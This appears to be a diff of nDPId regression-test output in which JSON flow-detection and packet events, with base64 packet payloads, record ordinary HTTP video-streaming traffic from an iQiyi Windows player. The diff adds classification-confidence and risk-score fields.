-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156959,"flow_last_seen":1467353156959,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"ts_msec":1467353156959,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/k","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156959,"flow_last_seen":1467353156959,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"ts_msec":1467353156959,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/k","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
 00948{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1050,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1467353156998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":430,"pkt_l4_len":396,"ts_msec":1467353156998,"pkt":"ABxCjnAxTF4M6gNlCABFAAGgqmFAADQG4c13vA28wKhzCABQxTljHjVVGvtS0lAYAB+FPAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtTGVuZ3RoOiAyMDQNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCnsidCI6IjE0NjczNTMxNTYiLCJtIjoiZWMyZmQ2Njc4YTM1N2MyMDhkNTE4NmIzYzM0MjI0NmJlZTQ0YzUwY2U3MDgzOTNlIiwidSI6ImVjMmZkNjY3OGEzNTdjMjBmNTVhODJlZDYwZjYzZjk2Y2QyMDlhMWQ4OGI3ODQyNSIsImkiOiIyMjAuMTgxLjEwOS4zMyIsImsiOiJlYzJmZDY2NzhhMzU3YzIwNjI1MTY2M2U4NGQ3MDFkOTlkYjQyZTUxY2I5MWM1MzkifQ=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157063,"flow_last_seen":1467353157063,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"ts_msec":1467353157063,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1467353157063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"ts_msec":1467353157063,"pkt":"TF4M6gNlABxCjnAxCABFAAFXDwhAAIAGMXDAqHMId7wNvMU6AFAWZyP1RIzmWFAYAQR4owAAR0VUIC8yZWZjOGNkNWZiZTBmNGVlNDk4ZmIxYzJmYzFkZThiNi92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2PyZ0bj0xMzc3MTkgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IHBkYXRhLnZpZGVvLnFpeWkuY29tDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157063,"flow_last_seen":1467353157063,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"ts_msec":1467353157063,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?&tn=137719","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
+00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157063,"flow_last_seen":1467353157063,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"ts_msec":1467353157063,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?&tn=137719","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
 01014{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1467353157103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":479,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":479,"pkt_l4_len":445,"ts_msec":1467353157103,"pkt":"ABxCjnAxTF4M6gNlCABFAAHRefhAADQGEgZ3vA28wKhzCABQxTpEjOZYFmclJFAYAB\/Y6wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjUyDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJiZ0bj0xMzc3MTkmdXVpZD03NmEzMDg1YS01Nzc2MDg0NC1kZSIsImUiOiIwIn0="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157138,"flow_last_seen":1467353157138,"flow_idle_time":7440000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":372,"midstream":1,"ts_msec":1467353157138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00940{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1467353157138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":426,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":426,"pkt_l4_len":392,"ts_msec":1467353157138,"pkt":"TF4M6gNlABxCjnAxCABFAAGcDxlAAIAGbTXAqHMI3xpqQsU7AFAuAjEcSma44VAYAQTWMgAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSYmdG49MTM3NzE5JnV1aWQ9NzZhMzA4NWEtNTc3NjA4NDQtZGUgSFRUUC8xLjENClJhbmdlOiBieXRlcz0wLTQwOTU5DQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiAyMjMuMjYuMTA2LjY2DQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDo1MDA0OTQ2MDBfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"}
-00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157138,"flow_last_seen":1467353157138,"flow_idle_time":7440000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":372,"midstream":1,"ts_msec":1467353157138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
+01042{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157138,"flow_last_seen":1467353157138,"flow_idle_time":7440000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":372,"midstream":1,"ts_msec":1467353157138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
 02170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1467353157142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"ts_msec":1467353157142,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUui5AADgGBqjfGmpCwKhzCABQxTtKZsK5LgIykFAQAB\/uTwAAXABAYzwo9cKPXABAY3wo9cKPXABAY7wo9cKPXAAACQAACKIJAAAyAAAAAAAAABcAAAAAAWQAH\/\/hAB1nZAAfrFYkCgL\/lmoCAgKAAAADAIAAABlHjBjFQAEABWjomvLAAAAAPQgAAAkAAAAAAAAArwATkFblpUgAAAAAFAkAbwgAAAAAAAAAFwEAAFAAAG7\/ZYiCABX\/95xkfm3FH8zfxiVyZItj2+QvcPG\/css\/ZW+K7oKmOXqvyof6+MpsbuBrR3NlYBBVWVRq3WcvPz43KJn6OOq7wUatnW33K69XETXFsUoSgXdN7o0kq4w+hJrrFVm3jhsmgXWVk6qs6hebWuZRXfCylsvlyYQvoo8ujkxwf\/jOPhyl6i\/pTDKbDQZOrGmk9iGos+6hcPjtrVmq5rC28bSpDQb\/l3J+48zXTAIJQ0eBYWXFdgZPT7ei\/1f\/9\/tmNrD8GxGJp2OeeHzKlWg0+2iCixox6opp5+CbF3ew+UCOGdg3U\/5oVyFXyPX7+O0Is6zwfWwGCWJoC6\/zQa49qCQPS9W27Dn4e7vsWHcsLdg3UHzR4Z1JuDFBW7ue0EA3sC0gP\/mqqJuTdXptxBOJRjQ63vSnOV7PtDcJs4A7oWz2JzmEh+VbAw2U5760xCgZf0h+IR4GdMhaD57XDY8NdoZSDUzKAjvVKzHkc\/gdXpR0l6TIGuQcP2n5BFznR2iYeCE\/miwzmIeVW7avmSkaYobdmdMxT40yLpSDo7E8P+71xqJEqUUh6vFl9rz126Cgazh0LClcgaFaNKcZScAJKPrVP1o7kkOIcKwxW2CdOD77SH4zyVYWD9ULtNPIZ77Kl\/LYJQ8L2R419x+V6vNClYH7FDNYQst\/D12fjQ\/m+4yqq8ANYgNFZAXKlC8uKiIfcH\/TAErY7s8c2cJx1lhY3xTKhpLrPcsLU9UsA+Oip34KoUwvW3F5sUP0n2c\/KNlUH5ayGqegy5bryGeYm\/zuaor3RjqVC+afHCqaNQNUM+bdihsi6\/dYDdiuHkznFARXAj+HmRzPclqFdQs0umlOh+4nrXrTgUTsq6Mijt5YgP1vOKM5AtjEldVCDmGr1tU5uzTP\/wOgMtD4fsuENAnY849iMY16mjQC8PBzOazume30AYsAvNe5umLe2Jg9g1q77PVd7s5Hu\/6sIJWIf7my9bXHqgu1vXqQE6ohulSfKXSbeWRxV1zDne\/VQKrMqsiN5thBJ6eGrmP690VCEON3vIc3K8eMxOBEG1sH2gt0\/QY+qtme7NqWlgnah6YGN282gbUWFJTA8lul4VGFodu6rBHcO4b\/OZ2Vgodz1eVa7Rvhlz0zeO\/YLtQjl7fwTfVY1piKLJlsXBuH5KXSLNolBVVHCVrAQmkekZvhiLsm\/G4SGTer+1uPrS5m3ZHSe234ovyt+yHtfZCEP\/\/gOVJ5LO7C7uAyroC7rFx6lIcBOyO9mnt4Fi0rv6nmI9Iuf1\/XjKYeJJ3hPNphBZXvUwpvdJUyrMP\/WSQf4xrhUZbkn+wcvgAg5Hq\/N\/ilxIaAfekOtHVgU5VwnYm0lrbpwZtnYoLYol2itsi\/Tiny8B2OHcGdfUzCAOCON\/0+\/ipakxXBeRa7CLgs5mjI+rNnEby8whMLuruKRetpD4LDPViHWG\/OwHoZ14S6hpwBDqQ07xh3U7DjW9xs4GqS"}
 02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1467353157142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"ts_msec":1467353157142,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUui9AADgGBqffGmpCwKhzCABQxTtKZselLgIykFAQAB\/aLgAAopnkFb6w\/Gf9wcd\/TnuexQBjLwWa0uCe9TPr4qE3jsphraOf\/lM4Hhi9NJILTNUPpkUh0lJVsTBg0+IryxSW3IwYySV6wkzB0\/tYDwbO6SOx\/W5mmrffIH5hc9hR+iJYkdxSMJyhs5tL+JX3Z4urkWLC21HQmnbWWhKwwr3IOESy8lC4QLT5bzgZZwV6aylc3BKRGmkWqvo3gveBLOrAMA4JoqHhbMBYA7GEB3n5XVRePARG35OUMCE\/8TDQo0+dLC24GKANopCzYZkvfPVaY0dRDrv50emXg1Cs9WSfVu50aDF7YYVdx5mx545GrUAMEsqIjDQ\/4DCox7xS+Ws\/dwFhUTJ0P8Dx\/xK2lp12JPYf\/zG6tdTYMt3AacBTBvLHFFde\/reBoQaTbZB\/vJdywKaKtIzwqCOs4Q9YPbL8+Pq1VE1FdEBeuONtnWPx9wNuAvH6U\/JENWXsD\/bsjom76483YU\/XZIQUgj30cOEgQwuDamiBln+90aAngeN2nOL6ntmgjdG66Xp5PKfwQlwuGdvacgApEFyIvnfxUhm77eXRcDexRzOKtayXJEIXZt52rm2WbDXx+l2L+n6mDI5HPlSGKuvP84rwmMwhT7yEvzQKbivh5sn9I8EjZx6KaukURUZTKe54jHmLC3Jmf2BKkUKfD+otim\/knbUQxDjsPRmRG1Nf5oF86K6KEl\/nFEI9A5kcjFcko+VuDqw9SWzSXgKad5EYc4r+hlUwt3uzj59viQUjCCWYguaIGZ8C5ZjdSExE6IsY1BXoMFqHoRzfJaDg6uSsFAjJS92cQgN0nWwTaQFWx1m2slB35iQ1wft22PbPDl49icFcTFpAz2oY5Pp3lfvj5IUJyUTHt3u8v74exA53o9ooOtbqs2j42om\/zaB3iyhBCsOikAKzbr0K6CxGSwBAWdloUe96BLdalzPNcqhIK0c0YJvH4tBdmDh+5ufseEBw7BGI2ipV6yVNpFO0kDqCajN7YsN05JDg13dAXzY2SAQ5QfKni3cz7N9WhYMt7COKUvI+C0iwIaEB32bniucRrN4HsPO11eCbWDnltN\/+kP2qhoa5r1DcSUAZq6JPm51\/USDg6qO4x\/Vapf6ZVCWehE+KdgGpX4qBTKeA+bV7qois7qvnsCmBXUWPo21DtRYTVMizQCWWQqH0CGGSEtoZ24ZE8Em+sX59yNgKKKnBzY4rxhy1pF8qyBkoHpDm9lBx3JEleYOnrbk5vilJTiHsG0C7im31hM5hXvKl2rEhKIpc+QgsAwc8xEkz7398lWjZRYNmVmvhEG3GTaIjL7zuDYVBFnz\/Ep+CquTSroYI\/KVwc+2ze3Q+yBDcODi+bFdRr\/qJ\/RfL4FgeDb9sduAkPb3xQiixfjLzyzTazf6dzG3+S06aSi8zpu2nZ2pA6Ukh\/FodlR311cw8YfsxYuiSFyYqZDzpce1Qm0XZXnys8qlDnUmjILug1tlJBa1UzH74juRDwgD0Fnwh1MLjNAsmUIrgA0GSsiEjUBU047yfXV\/qzyvQus+1BXKIiklyV0Xin7L0ua0Yj38t6gGn+ytwXAmSh71WYg7o3suhEh2DpzfHKZ9IBKf8gIvOvhTvSepAfXGEaca4phlMY6YIuwsde9HzRk9q6m3wLv6MKf1l9nyMKAHgaDMdK68E7LAU50IjtX2yCF8K"}
+01052{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1055,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353157138,"flow_last_seen":1467353157142,"flow_idle_time":7440000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2892,"flow_avg_l4_payload_len":964,"midstream":1,"ts_msec":1467353157142,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157433,"flow_last_seen":1467353157433,"flow_idle_time":7440000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":335,"midstream":1,"ts_msec":1467353157433,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1467353157433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":389,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":389,"pkt_l4_len":355,"ts_msec":1467353157433,"pkt":"TF4M6gNlABxCjnAxCABFAAF3D2lAAIAGOZbAqHMIb84NA8U8AFD\/xaF06zAEllAYAQRGTAAAR0VUIC8yZWZjOGNkNWZiZTBmNGVlNDk4ZmIxYzJmYzFkZThiNi92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P3F5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiBIVFRQLzEuMQ0KSG9zdDogcGRhdGEudmlkZW8ucWl5aS5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBIQ0ROQ2xpZW50X1dJTlBDO2xpYmN1cmwvNy4yNi4wIE9wZW5TU0wvMS4wLjFnIHpsaWIvMS4yLjU7UUsvMTAuMC4wLjI5Mw0KDQo="}
-00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157433,"flow_last_seen":1467353157433,"flow_idle_time":7440000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":335,"midstream":1,"ts_msec":1467353157433,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}}
+00978{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157433,"flow_last_seen":1467353157433,"flow_idle_time":7440000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":335,"midstream":1,"ts_msec":1467353157433,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157468,"flow_last_seen":1467353157468,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"ts_msec":1467353157468,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1467353157468,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"ts_msec":1467353157468,"pkt":"TF4M6gNlABxCjnAxCABFAAOkD3JAAIAG2tjAqHMIymwO7MU9AFA84A6MMfAazlAYQTez3QAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNTcwNDYmc2g9JnNxPSZzdz0mdD0zcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="}
